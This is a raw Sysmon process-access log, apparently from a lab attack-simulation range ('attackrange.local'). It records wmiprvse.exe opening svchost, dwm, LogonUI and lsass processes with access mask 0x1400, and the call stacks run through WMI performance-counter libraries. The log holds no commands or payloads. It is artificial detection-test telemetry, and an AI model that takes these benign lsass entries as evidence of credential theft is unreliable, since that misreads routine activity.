21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151142Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151141Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151140Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151139Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151138Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151137Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151136Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151135Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151134Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151133Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151132Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151131Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151130Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151129Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151128Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151127Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 